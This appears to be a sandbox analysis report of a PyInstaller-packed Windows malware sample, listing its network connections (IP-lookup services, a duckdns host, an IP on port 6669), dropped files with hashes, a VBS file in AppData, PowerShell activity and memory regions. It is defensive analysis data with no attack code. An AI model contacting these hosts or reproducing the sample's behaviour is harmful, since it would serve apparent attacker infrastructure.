C:\Windows\SysWOW64\WerFault.exe -u -p 4316 -s 2500

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 198.1.85.104.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 ifconfig.me udp
US 34.117.118.44:443 ifconfig.me tcp
US 8.8.8.8:53 44.118.117.34.in-addr.arpa udp
US 8.8.8.8:53 testhostnameserver.duckdns.org udp
BG 91.92.248.125:80 testhostnameserver.duckdns.org tcp
US 8.8.8.8:53 125.248.92.91.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
NL 185.238.3.205:6669 tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 205.3.238.185.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 58.252.72.23.in-addr.arpa udp

Files

memory/3128-0-0x00007FF70CCF0000-0x00007FF70D33E000-memory.dmp

memory/3128-1-0x00007FF70CCF0000-0x00007FF70D33E000-memory.dmp

memory/3128-2-0x00007FF70CCF0000-0x00007FF70D33E000-memory.dmp

memory/3128-3-0x00007FF70CCF0000-0x00007FF70D33E000-memory.dmp

memory/2148-76-0x00007FF70CCF0000-0x00007FF70D33E000-memory.dmp

memory/2148-77-0x00007FF70CCF0000-0x00007FF70D33E000-memory.dmp

memory/2148-78-0x00007FF70CCF0000-0x00007FF70D33E000-memory.dmp

memory/2148-79-0x00007FF70CCF0000-0x00007FF70D33E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI31282\ucrtbase.dll

MD5 298e85be72551d0cdd9ed650587cfdc6
SHA1 5a82bcc324fb28a5147b4e879b937fb8a56b760c
SHA256 eb89af5911a60d892a685181c397d32b72c61dc2ad77dd45b8cac0fbb7602b84
SHA512 3fafea5ff0d0b4e07f6354c37b367ada4da1b607186690c732364518a93c3fd2f5004014c9c3d23dde28db87d1cb9ae1259cda68b9ba757db59a59d387ac4e02

C:\Users\Admin\AppData\Local\Temp\_MEI31282\python38.dll

MD5 687bac86f9a2330d898903ee91d332d7
SHA1 af40c22b253a130ae0ef0300c746faa8ff3e52b8
SHA256 72793448d6feba5b6a07053d39474c239b0932a867580ac7c3fc2aa417b4eacf
SHA512 d471f0212089b94d9d70852ff398e7a3241c1c6680f2b5fffdb9756182184a4bab4f52d21ab511512b3658306e44a6dc924b4bd64b8b2b6cdbf546e07b936135

C:\Users\Admin\AppData\Local\Temp\_MEI31282\ucrtbase.dll

MD5 298e85be72551d0cdd9ed650587cfdc6
SHA1 5a82bcc324fb28a5147b4e879b937fb8a56b760c
SHA256 eb89af5911a60d892a685181c397d32b72c61dc2ad77dd45b8cac0fbb7602b84
SHA512 3fafea5ff0d0b4e07f6354c37b367ada4da1b607186690c732364518a93c3fd2f5004014c9c3d23dde28db87d1cb9ae1259cda68b9ba757db59a59d387ac4e02

C:\Users\Admin\AppData\Local\Temp\_MEI31282\VCRUNTIME140.dll

MD5 0e675d4a7a5b7ccd69013386793f68eb
SHA1 6e5821ddd8fea6681bda4448816f39984a33596b
SHA256 bf5ff4603557c9959acec995653d052d9054ad4826df967974efd2f377c723d1
SHA512 cae69a90f92936febde67dacd6ce77647cb3b3ed82bb66463cd9047e90723f633aa2fc365489de09fecdc510be15808c183b12e6236b0893af19633f6a670e66

C:\Users\Admin\AppData\Local\Temp\_MEI31282\VCRUNTIME140.dll

MD5 0e675d4a7a5b7ccd69013386793f68eb
SHA1 6e5821ddd8fea6681bda4448816f39984a33596b
SHA256 bf5ff4603557c9959acec995653d052d9054ad4826df967974efd2f377c723d1
SHA512 cae69a90f92936febde67dacd6ce77647cb3b3ed82bb66463cd9047e90723f633aa2fc365489de09fecdc510be15808c183b12e6236b0893af19633f6a670e66

C:\Users\Admin\AppData\Local\Temp\_MEI31282\python38.dll

MD5 687bac86f9a2330d898903ee91d332d7
SHA1 af40c22b253a130ae0ef0300c746faa8ff3e52b8
SHA256 72793448d6feba5b6a07053d39474c239b0932a867580ac7c3fc2aa417b4eacf
SHA512 d471f0212089b94d9d70852ff398e7a3241c1c6680f2b5fffdb9756182184a4bab4f52d21ab511512b3658306e44a6dc924b4bd64b8b2b6cdbf546e07b936135

memory/2148-86-0x00007FF934EE0000-0x00007FF935322000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI31282\base_library.zip

MD5 ea942658e75c4365bfefcfc73a81a53d
SHA1 8e01d18719c63a1d7b0d274c7d287636fc41a3e6
SHA256 c74c7e3264883f14b86bf2c4211db1b277a488a3345c952868cf3345d7a4de22
SHA512 7010470bed8c2f52982683f3f7d9a7a884948995a45df1398a597b505f0dd05f515a1caa9189252c90b54da927a512cdb02ac927b564a9ef4461348335e0a37b

C:\Users\Admin\AppData\Local\Temp\_MEI31282\python3.dll

MD5 11a8500bc31356fae07dd604d6662efb
SHA1 4b260e5105131cdcae9313d1833cce0004c02858
SHA256 521f17a2caab35730bfdccb954704a6ffc035d4f7ea24208c76f6a45f30fd0b6
SHA512 15f967bdf3c64c7435bfa48fe4a8c3157b4568c08f396bc20fde7cb802aa0a633afaa987b1ebdf7851c6aa405e65f28d754bca8e06ff0a3b54f6da9a6d81d7c4

C:\Users\Admin\AppData\Local\Temp\_MEI31282\_ctypes.pyd

MD5 216682f01cb4fd3fbf5d31674f5ff9cf
SHA1 4b24fc944e6998280098ca207e0ea33e52767996
SHA256 8dbef8fd9ce588db70b9f35b408d361f5d0cece4cb9a9edfeb75f9532a0ea92d
SHA512 c97d96807bd8fffb55dd031482e926d0ef8923f4520083aec03bdd36d249d61e7cacde99fa7981f453408941cbec609e228f19487c780855b1add2a72fc00a98

C:\Users\Admin\AppData\Local\Temp\_MEI31282\_bz2.pyd

MD5 71c208605d9d1a1b822ed14e40bde272
SHA1 d605b1891c2b9360344f878f7aeae90a95e1425b
SHA256 23330e593f5323caae5f992051d47d0e5b5c27c7b55c13b1e1f8869d0497725c
SHA512 410c1e009b2c65c4c42c4d926a5fe9a4a4a0744872a4497ad0bb20c40897264124bd653490cba5214a6bfdb8b5ab3681d7c796e2ffe63107da3ba65194381e09

C:\Users\Admin\AppData\Local\Temp\_MEI31282\_lzma.pyd

MD5 c0af87822386bd3a1d44cab21c644866
SHA1 f19ce82573538a46cd150841d7b1d1adad7c0d43
SHA256 1f81f40a76ada929a590f56ffaa16c5d610fd65f89213858837ecc9b0f1952f4
SHA512 51d0b819e0d79628af6f028306ae8730b640c04bc4087d9611fbbd6d5c3b6cdc56f2357813a01168e01afe0f0b3402fa151ba009f5af3f5696735adc41a3b6db

C:\Users\Admin\AppData\Local\Temp\_MEI31282\_lzma.pyd

MD5 c0af87822386bd3a1d44cab21c644866
SHA1 f19ce82573538a46cd150841d7b1d1adad7c0d43
SHA256 1f81f40a76ada929a590f56ffaa16c5d610fd65f89213858837ecc9b0f1952f4
SHA512 51d0b819e0d79628af6f028306ae8730b640c04bc4087d9611fbbd6d5c3b6cdc56f2357813a01168e01afe0f0b3402fa151ba009f5af3f5696735adc41a3b6db

C:\Users\Admin\AppData\Local\Temp\_MEI31282\_ssl.pyd

MD5 fea35ba9d29d6aac516c26d09007e2c9
SHA1 1280f308d93cc7c03c779ab174b2caf439fd47c1
SHA256 bac2fb525115bb2d231bc218d0e75d9120314521f16a097851ae96bf7ae51dc0
SHA512 4a7d6a63e255bdb621d226b61707dde66e7f1f6f462f7f7049eba05f28f07edd457ef6daf59e11ea08506c28627b1e4fbaa328c27fd048df70ff95b98d424d8e

C:\Users\Admin\AppData\Local\Temp\_MEI31282\libcrypto-1_1.dll

MD5 32cbd9ff7c75634dd4cf282e218e5e5f
SHA1 a2d19b46736e4979a3974e4079cb43dea27a7fec
SHA256 44acd462cd91834ff39595bd022115b0f226a01b8cfefb240b3be72dbcc5be6b
SHA512 a7db2541a119701926eea097374b7d4bb281693bd01a31a019a07c0cb0988643c803c5216a295ecad670c9371760e289851df5fc5d94776544e880cb4136aa5f

C:\Users\Admin\AppData\Local\Temp\_MEI31282\libssl-1_1.dll

MD5 6eddc102f5c63f22d7862a542b0a96f0
SHA1 a7018895576bfbbdd5c437427e54de279b738233
SHA256 ca7f5b7245d5dbdabbea7d475a3687be2cbdb0007e4f8d36491ca2ff9221be1e
SHA512 113d2cbf432c0ac48265fcbbf0ae5f95ce0ef1d397a879bb539715213b47662488ffc9f4738d7dcd80861bd1acb1631ef4d30e733123931151e552a2e0f557ab

C:\Users\Admin\AppData\Local\Temp\_MEI31282\libcrypto-1_1.dll

MD5 32cbd9ff7c75634dd4cf282e218e5e5f
SHA1 a2d19b46736e4979a3974e4079cb43dea27a7fec
SHA256 44acd462cd91834ff39595bd022115b0f226a01b8cfefb240b3be72dbcc5be6b
SHA512 a7db2541a119701926eea097374b7d4bb281693bd01a31a019a07c0cb0988643c803c5216a295ecad670c9371760e289851df5fc5d94776544e880cb4136aa5f

memory/2148-109-0x00007FF944B00000-0x00007FF944B24000-memory.dmp

memory/2148-111-0x00007FF944AE0000-0x00007FF944AFB000-memory.dmp

memory/2148-110-0x00007FF948B20000-0x00007FF948B2F000-memory.dmp

memory/2148-112-0x00007FF944870000-0x00007FF9448B4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI31282\libcrypto-1_1.dll

MD5 32cbd9ff7c75634dd4cf282e218e5e5f
SHA1 a2d19b46736e4979a3974e4079cb43dea27a7fec
SHA256 44acd462cd91834ff39595bd022115b0f226a01b8cfefb240b3be72dbcc5be6b
SHA512 a7db2541a119701926eea097374b7d4bb281693bd01a31a019a07c0cb0988643c803c5216a295ecad670c9371760e289851df5fc5d94776544e880cb4136aa5f

C:\Users\Admin\AppData\Local\Temp\_MEI31282\libssl-1_1.dll

MD5 6eddc102f5c63f22d7862a542b0a96f0
SHA1 a7018895576bfbbdd5c437427e54de279b738233
SHA256 ca7f5b7245d5dbdabbea7d475a3687be2cbdb0007e4f8d36491ca2ff9221be1e
SHA512 113d2cbf432c0ac48265fcbbf0ae5f95ce0ef1d397a879bb539715213b47662488ffc9f4738d7dcd80861bd1acb1631ef4d30e733123931151e552a2e0f557ab

C:\Users\Admin\AppData\Local\Temp\_MEI31282\_ssl.pyd

MD5 fea35ba9d29d6aac516c26d09007e2c9
SHA1 1280f308d93cc7c03c779ab174b2caf439fd47c1
SHA256 bac2fb525115bb2d231bc218d0e75d9120314521f16a097851ae96bf7ae51dc0
SHA512 4a7d6a63e255bdb621d226b61707dde66e7f1f6f462f7f7049eba05f28f07edd457ef6daf59e11ea08506c28627b1e4fbaa328c27fd048df70ff95b98d424d8e

C:\Users\Admin\AppData\Local\Temp\_MEI31282\select.pyd

MD5 9ecbd2b240256b4443b54cdb892cff71
SHA1 7a75f149b05e017f7b94fd3d07551995be53616f
SHA256 6fce6db4bafee285c9ca06b0b088aa1f18d43409125981e4e4c8954c9ee20846
SHA512 48f91ce8d273d51c27a1b9bf6c581d42e0d79b39dcb41f6e4ff202190e4b7e0d6f5e87f2933a84c0838874155608aedacbd8d20f76688732da671e5b2d6ed5f1

C:\Users\Admin\AppData\Local\Temp\_MEI31282\select.pyd

MD5 9ecbd2b240256b4443b54cdb892cff71
SHA1 7a75f149b05e017f7b94fd3d07551995be53616f
SHA256 6fce6db4bafee285c9ca06b0b088aa1f18d43409125981e4e4c8954c9ee20846
SHA512 48f91ce8d273d51c27a1b9bf6c581d42e0d79b39dcb41f6e4ff202190e4b7e0d6f5e87f2933a84c0838874155608aedacbd8d20f76688732da671e5b2d6ed5f1

C:\Users\Admin\AppData\Local\Temp\_MEI31282\_socket.pyd

MD5 50e71ec18045021bc098b2b0aed1813b
SHA1 804685545b2633cb36d8cea8d6b0604d45da531d
SHA256 d3a48b335b62b37d467e4d36e514101bd9215f66356cb16ecf750ee78cc2d323
SHA512 cec2589a1d836be599aa1ba5c33b88feb3a805d42658cbb631fba810948f85c34382a223ac26a72b7eaf0f1d30ba2e368c3d2e4ae7ff32f25fc1d6e739f24310

C:\Users\Admin\AppData\Local\Temp\_MEI31282\_socket.pyd

MD5 50e71ec18045021bc098b2b0aed1813b
SHA1 804685545b2633cb36d8cea8d6b0604d45da531d
SHA256 d3a48b335b62b37d467e4d36e514101bd9215f66356cb16ecf750ee78cc2d323
SHA512 cec2589a1d836be599aa1ba5c33b88feb3a805d42658cbb631fba810948f85c34382a223ac26a72b7eaf0f1d30ba2e368c3d2e4ae7ff32f25fc1d6e739f24310

C:\Users\Admin\AppData\Local\Temp\_MEI31282\_bz2.pyd

MD5 71c208605d9d1a1b822ed14e40bde272
SHA1 d605b1891c2b9360344f878f7aeae90a95e1425b
SHA256 23330e593f5323caae5f992051d47d0e5b5c27c7b55c13b1e1f8869d0497725c
SHA512 410c1e009b2c65c4c42c4d926a5fe9a4a4a0744872a4497ad0bb20c40897264124bd653490cba5214a6bfdb8b5ab3681d7c796e2ffe63107da3ba65194381e09

C:\Users\Admin\AppData\Local\Temp\_MEI31282\libffi-7.dll

MD5 b5150b41ca910f212a1dd236832eb472
SHA1 a17809732c562524b185953ffe60dfa91ba3ce7d
SHA256 1a106569ac0ad3152f3816ff361aa227371d0d85425b357632776ac48d92ea8a
SHA512 9e82b0caa3d72bb4a7ad7d66ebfb10edb778749e89280bca67c766e72dc794e99aab2bc2980d64282a384699929ce6cc996462a73584898d2df67a57bff2a9c6

C:\Users\Admin\AppData\Local\Temp\_MEI31282\libffi-7.dll

MD5 b5150b41ca910f212a1dd236832eb472
SHA1 a17809732c562524b185953ffe60dfa91ba3ce7d
SHA256 1a106569ac0ad3152f3816ff361aa227371d0d85425b357632776ac48d92ea8a
SHA512 9e82b0caa3d72bb4a7ad7d66ebfb10edb778749e89280bca67c766e72dc794e99aab2bc2980d64282a384699929ce6cc996462a73584898d2df67a57bff2a9c6

C:\Users\Admin\AppData\Local\Temp\_MEI31282\python3.dll

MD5 11a8500bc31356fae07dd604d6662efb
SHA1 4b260e5105131cdcae9313d1833cce0004c02858
SHA256 521f17a2caab35730bfdccb954704a6ffc035d4f7ea24208c76f6a45f30fd0b6
SHA512 15f967bdf3c64c7435bfa48fe4a8c3157b4568c08f396bc20fde7cb802aa0a633afaa987b1ebdf7851c6aa405e65f28d754bca8e06ff0a3b54f6da9a6d81d7c4

C:\Users\Admin\AppData\Local\Temp\_MEI31282\_ctypes.pyd

MD5 216682f01cb4fd3fbf5d31674f5ff9cf
SHA1 4b24fc944e6998280098ca207e0ea33e52767996
SHA256 8dbef8fd9ce588db70b9f35b408d361f5d0cece4cb9a9edfeb75f9532a0ea92d
SHA512 c97d96807bd8fffb55dd031482e926d0ef8923f4520083aec03bdd36d249d61e7cacde99fa7981f453408941cbec609e228f19487c780855b1add2a72fc00a98

C:\Users\Admin\AppData\Local\Temp\_MEI31282\_queue.pyd

MD5 9cb23d7372b166013adde2f53ba7a112
SHA1 89efeb10324b8a8a0e2d763a7087b515d2368122
SHA256 376584e748ce83446160b0315bb85bed33b31ac6e25e573fa22e56c1cf96e82a
SHA512 dcff6cc1b8b6240b9ab6ebc02ab9b085bc2a532d2c37b002e17dbbdee0a3d66f5e12c8b5dc4168fdf53dafc648152ddfcd52e0cce2c04cbf8ef9db4d601d29ac

C:\Users\Admin\AppData\Local\Temp\_MEI31282\_brotli.cp38-win_amd64.pyd

MD5 1ed41b26e3675333e0d29b032c032655
SHA1 0cc93e4243a93e8b57e90a8ba57b6494e158d889
SHA256 cea46020761f6fc2a0ca404c9f503bc8c415389568374bb4e5ba4efae89c69a2
SHA512 0a9394294a3b26958618d3a90a4af960bee39cc9a193f3bed8d4da7b6e698126e4f07b817f55f880ef7534e3871b0cb89fb3a4cc3e8177d16cfdeb9806825a68

C:\Users\Admin\AppData\Local\Temp\_MEI31282\_queue.pyd

MD5 9cb23d7372b166013adde2f53ba7a112
SHA1 89efeb10324b8a8a0e2d763a7087b515d2368122
SHA256 376584e748ce83446160b0315bb85bed33b31ac6e25e573fa22e56c1cf96e82a
SHA512 dcff6cc1b8b6240b9ab6ebc02ab9b085bc2a532d2c37b002e17dbbdee0a3d66f5e12c8b5dc4168fdf53dafc648152ddfcd52e0cce2c04cbf8ef9db4d601d29ac

C:\Users\Admin\AppData\Local\Temp\_MEI31282\_brotli.cp38-win_amd64.pyd

MD5 1ed41b26e3675333e0d29b032c032655
SHA1 0cc93e4243a93e8b57e90a8ba57b6494e158d889
SHA256 cea46020761f6fc2a0ca404c9f503bc8c415389568374bb4e5ba4efae89c69a2
SHA512 0a9394294a3b26958618d3a90a4af960bee39cc9a193f3bed8d4da7b6e698126e4f07b817f55f880ef7534e3871b0cb89fb3a4cc3e8177d16cfdeb9806825a68

C:\Users\Admin\AppData\Local\Temp\_MEI31282\MSVCP140.dll

MD5 ba72c2f6f465926980adc2fb7f8b3490
SHA1 63de0e3c14d0f45c1edab1c3ecd4adfb78ee8cdd
SHA256 86881a7054532019291c162f0a8177980c1c2b45490f7e88543f22915d08d9ff
SHA512 05136a8dde4359efd112341b12e0545accc8d018e4fa7495b071197833a0227bd50879d7753b61582505b8e2286f845604008bd2020e689e148037a9ef7d7474

C:\Users\Admin\AppData\Local\Temp\_MEI31282\MSVCP140.dll

MD5 ba72c2f6f465926980adc2fb7f8b3490
SHA1 63de0e3c14d0f45c1edab1c3ecd4adfb78ee8cdd
SHA256 86881a7054532019291c162f0a8177980c1c2b45490f7e88543f22915d08d9ff
SHA512 05136a8dde4359efd112341b12e0545accc8d018e4fa7495b071197833a0227bd50879d7753b61582505b8e2286f845604008bd2020e689e148037a9ef7d7474

memory/2148-121-0x00007FF944840000-0x00007FF944866000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI31282\_hashlib.pyd

MD5 e9aa28173e7db0432aabd1b0baf3410d
SHA1 ce29a7301e728d67e9994687f49fe7cf1e0b7c68
SHA256 18b004d57a43a2eb522a52c713f11fe805b373c61f064e6d288015d828251311
SHA512 a60c2e9b3d67b47b68c0a2eddedf2a0167082c180fc1bc247b34fd3e7fc40d708e01c6b202a8b54c36e86252b2c419a519974ac89b8048f736020ff93868c945

memory/2148-123-0x00007FF9440E0000-0x00007FF944195000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI31282\_decimal.pyd

MD5 c1c494b8380c29ced226860acedc4095
SHA1 41cc7139ec35aa082d4f4bc348fe3ef99666f5c3
SHA256 1ad4d1c69ca6a4beb174085fae0e65537476a4ea44b394927549900233cd7e70
SHA512 aaaa74a1b2494ac47124c24871ae7cc71f834731225210a1548decb01c4ece29321a1f01da45a284f6e3aaf31b4ecc9e1dc25279339507be9d8dfd318ed0aebb

C:\Users\Admin\AppData\Local\Temp\_MEI31282\unicodedata.pyd

MD5 5008d7328699c64b8c6efca2f3cd99b0
SHA1 b8b558a51be19a945fccd0c8d08a4343e808c38a
SHA256 748c0e27fd7e86f7c704d3f772a40cffd5f4fe86e0996917c5a144278df0701d
SHA512 e7e29ac83e75e6da73763fb8e5a612d04b8ea7639ddced75c2e31d1ca607517261363d2c6584d2a4376e8e1dd7f20db3ae0b6d4d348cc9e5c8dd4ed2ac199899

memory/2148-128-0x00000244E4380000-0x00000244E46E9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI31282\unicodedata.pyd

MD5 5008d7328699c64b8c6efca2f3cd99b0
SHA1 b8b558a51be19a945fccd0c8d08a4343e808c38a
SHA256 748c0e27fd7e86f7c704d3f772a40cffd5f4fe86e0996917c5a144278df0701d
SHA512 e7e29ac83e75e6da73763fb8e5a612d04b8ea7639ddced75c2e31d1ca607517261363d2c6584d2a4376e8e1dd7f20db3ae0b6d4d348cc9e5c8dd4ed2ac199899

C:\Users\Admin\AppData\Local\Temp\_MEI31282\_decimal.pyd

MD5 c1c494b8380c29ced226860acedc4095
SHA1 41cc7139ec35aa082d4f4bc348fe3ef99666f5c3
SHA256 1ad4d1c69ca6a4beb174085fae0e65537476a4ea44b394927549900233cd7e70
SHA512 aaaa74a1b2494ac47124c24871ae7cc71f834731225210a1548decb01c4ece29321a1f01da45a284f6e3aaf31b4ecc9e1dc25279339507be9d8dfd318ed0aebb

memory/2148-130-0x00007FF934B70000-0x00007FF934ED9000-memory.dmp

memory/2148-131-0x00007FF934A90000-0x00007FF934B66000-memory.dmp

memory/2148-132-0x00007FF944090000-0x00007FF9440D7000-memory.dmp

memory/2148-133-0x00007FF944F30000-0x00007FF944F3D000-memory.dmp

memory/2148-134-0x00007FF944F00000-0x00007FF944F10000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI31282\_hashlib.pyd

MD5 e9aa28173e7db0432aabd1b0baf3410d
SHA1 ce29a7301e728d67e9994687f49fe7cf1e0b7c68
SHA256 18b004d57a43a2eb522a52c713f11fe805b373c61f064e6d288015d828251311
SHA512 a60c2e9b3d67b47b68c0a2eddedf2a0167082c180fc1bc247b34fd3e7fc40d708e01c6b202a8b54c36e86252b2c419a519974ac89b8048f736020ff93868c945

memory/2148-135-0x00007FF9348D0000-0x00007FF9349E2000-memory.dmp

memory/2148-120-0x00007FF948B10000-0x00007FF948B1D000-memory.dmp

memory/2148-113-0x00007FF944AC0000-0x00007FF944AD9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI31282\certifi\cacert.pem

MD5 edd513e1d62ca2b059821b8380c19d19
SHA1 7e785afc6a7174f008b8b6e775c91c018d72aee3
SHA256 870068ef78059c5d012a23f715029f1b7db19060e1c65e12c024221f6ac32abd
SHA512 31450f875b46bbbb8e8d2f2e075f82ab4cfe175dadd966be22c66206d5dc2517a870a8cfc46f2f094b6810c09b447bd46354b67c128843b997957522d3cf4f5f

C:\Users\Admin\AppData\Roaming\WindowsAPIwsh\WindowsAPIwsh.vbs

MD5 b73dc14e83c35d9c4fba66539634d249
SHA1 d78300e7372da3df6c8341478091dc9abaeff28a
SHA256 16f8d864a65be446febd4602bf644d0452e6372e7ec8b8d2e3d50d8dc3c71553
SHA512 130a190a58765a25e385365777cc14a42c56b5d03b44e1c82555c918acd45d7723eda345135e03aa5983cf79792209e8453dc09c6ed027fa6e380151af267eb6

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e3dxb5ms.gmg.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3300-141-0x000002119EB50000-0x000002119EB72000-memory.dmp

memory/3300-149-0x00007FF933C20000-0x00007FF9346E1000-memory.dmp

memory/3300-150-0x00000211B7000000-0x00000211B7010000-memory.dmp

memory/4316-153-0x0000000002750000-0x0000000002786000-memory.dmp

memory/4316-155-0x0000000074E20000-0x00000000755D0000-memory.dmp

memory/3300-154-0x00007FF933C20000-0x00007FF9346E1000-memory.dmp

memory/4316-156-0x0000000002720000-0x0000000002730000-memory.dmp

memory/4316-157-0x0000000002720000-0x0000000002730000-memory.dmp

memory/4316-158-0x0000000005360000-0x0000000005988000-memory.dmp

memory/4316-159-0x0000000005170000-0x0000000005192000-memory.dmp

memory/4316-160-0x0000000005220000-0x0000000005286000-memory.dmp

memory/4316-161-0x0000000005290000-0x00000000052F6000-memory.dmp

memory/4316-171-0x0000000005B10000-0x0000000005E64000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3ca1082427d7b2cd417d7c0b7fd95e4e
SHA1 b0482ff5b58ffff4f5242d77330b064190f269d3
SHA256 31f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f
SHA512 bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3

memory/4316-173-0x0000000006070000-0x000000000608E000-memory.dmp

memory/4316-174-0x00000000060B0000-0x00000000060FC000-memory.dmp

memory/3128-175-0x00007FF70CCF0000-0x00007FF70D33E000-memory.dmp

memory/2148-176-0x00007FF70CCF0000-0x00007FF70D33E000-memory.dmp

memory/2148-177-0x00007FF934EE0000-0x00007FF935322000-memory.dmp

memory/2148-178-0x00007FF944B00000-0x00007FF944B24000-memory.dmp

memory/2148-180-0x00007FF944AE0000-0x00007FF944AFB000-memory.dmp

memory/2148-181-0x00007FF944870000-0x00007FF9448B4000-memory.dmp

memory/2148-182-0x00007FF944AC0000-0x00007FF944AD9000-memory.dmp

memory/2148-184-0x00007FF944840000-0x00007FF944866000-memory.dmp

memory/2148-185-0x00007FF9440E0000-0x00007FF944195000-memory.dmp

memory/2148-186-0x00007FF934B70000-0x00007FF934ED9000-memory.dmp

memory/4316-192-0x00000000078C0000-0x0000000007F3A000-memory.dmp

memory/4316-193-0x0000000006580000-0x000000000659A000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\mpms03uf\mpms03uf.cmdline

MD5 b1796a4b57291dcb1cc17cadb0f05dc3
SHA1 3b6634d13c4cf1418066dde77eda6b3796df9332
SHA256 6b205d490485ba5a075d38aabca522f64d8e8f076068c1468ef57f6a790a7eeb
SHA512 9361e7c91d9a736617e3a2f4d6756fa97ff87d56a002ed938daf3100ee9458a7dce7acac8f04747a0fad60e03eaa716a6574382dbeed575f77d17ffe7ed6a6a4

\??\c:\Users\Admin\AppData\Local\Temp\mpms03uf\mpms03uf.0.cs

MD5 96abe1dd385b1c723e8c5833aa3cdfee
SHA1 66c0638a3c2893e7fa2b7745601c15e22cdc8060
SHA256 90ff1e4493446751ad38983237349b90568304ab4d10d56205cc010d23e6ac58
SHA512 66f2d65e7d8a168b618ccc203dedad2c8abcbd2a4d94f6e1816b0a425962946b8128203801761a67508faa935af13b8fc73cf30505ba55006d146c3e5b56a77c

\??\c:\Users\Admin\AppData\Local\Temp\mpms03uf\CSCFA0F31AEBFE442D38D5F756AE4D6604E.TMP

MD5 c90a1221dfea2642bb384e17be055c57
SHA1 cf2c2517dd32e1217e7cce1e1ad751f32d3aefa7
SHA256 0d972ff5d6c63bd5d3560d6413ca845d961426382e5eecfb523b21e4a7cf317d
SHA512 fb33d64866fabcc6dfd3968be1a701517e24d633f595002d28cfeeff5233e8d06fb3dee4526bc131da7fc3966460ece7a41a77eaaf862c54de15c5f33ee7ffcf

C:\Users\Admin\AppData\Local\Temp\RES191.tmp

MD5 4e1b3e1826c1dec1caf2c55a54f5fa68
SHA1 3594c54437a9a84007483ee59bc47b3f5817a3ab
SHA256 df0c3a29b9c126e189d2e7c368f65bbdeda5f53cd592941ffa9630bb810f0bbc
SHA512 ad72ea6a896877f4ef4a2d63126c499282dd5527e069dcad53849cb7c4a83f0f1c434fcd93cada30c9a824cc550bfe12b3496769251968b5f9b6a87e53f0e42f

C:\Users\Admin\AppData\Local\Temp\mpms03uf\mpms03uf.dll

MD5 6e6cdebc495cdc2571ee43f05e479c9c
SHA1 55e9048785815d53aedb5cc36f4825fcacb3e78a
SHA256 c0e6f33e047430bd700b6e922394928b8a762b4ba529034a450fc8a2cfa10876
SHA512 642280810f2f6af0703464593aed0afb58ae4a0732ab48e570eff6a5be8a01fbd4e620edb944d6fcbc9494ce6ef7ac5da6f2f4d111dc55571aac0a278ecc4487

memory/4316-206-0x0000000006630000-0x0000000006638000-memory.dmp

memory/3128-208-0x00007FF70CCF0000-0x00007FF70D33E000-memory.dmp

memory/3712-209-0x0000000000400000-0x000000000044E000-memory.dmp

memory/3712-210-0x0000000005CC0000-0x0000000006264000-memory.dmp

memory/3712-211-0x0000000074E20000-0x00000000755D0000-memory.dmp

memory/3712-212-0x00000000057C0000-0x0000000005852000-memory.dmp

memory/2148-213-0x00007FF70CCF0000-0x00007FF70D33E000-memory.dmp

memory/3712-214-0x00000000058B0000-0x00000000058C0000-memory.dmp

memory/4316-215-0x0000000074E20000-0x00000000755D0000-memory.dmp

memory/3712-216-0x00000000067D0000-0x00000000067E2000-memory.dmp

memory/3712-217-0x0000000006C10000-0x0000000006C4C000-memory.dmp

memory/3712-219-0x0000000006F80000-0x0000000006F8A000-memory.dmp

memory/3128-220-0x00007FF70CCF0000-0x00007FF70D33E000-memory.dmp

memory/2148-221-0x00007FF70CCF0000-0x00007FF70D33E000-memory.dmp

memory/2148-222-0x00007FF934EE0000-0x00007FF935322000-memory.dmp

memory/2148-237-0x00000244E4380000-0x00000244E46E9000-memory.dmp

memory/2148-238-0x00007FF70CCF0000-0x00007FF70D33E000-memory.dmp

memory/2148-239-0x00007FF934EE0000-0x00007FF935322000-memory.dmp

memory/2148-240-0x00007FF944B00000-0x00007FF944B24000-memory.dmp

memory/2148-241-0x00007FF948B20000-0x00007FF948B2F000-memory.dmp

memory/2148-242-0x00007FF944AE0000-0x00007FF944AFB000-memory.dmp

memory/2148-243-0x00007FF944870000-0x00007FF9448B4000-memory.dmp

memory/2148-244-0x00007FF944AC0000-0x00007FF944AD9000-memory.dmp

memory/2148-245-0x00007FF948B10000-0x00007FF948B1D000-memory.dmp

memory/2148-246-0x00007FF944840000-0x00007FF944866000-memory.dmp

memory/2148-247-0x00007FF9440E0000-0x00007FF944195000-memory.dmp

memory/2148-248-0x00007FF934B70000-0x00007FF934ED9000-memory.dmp

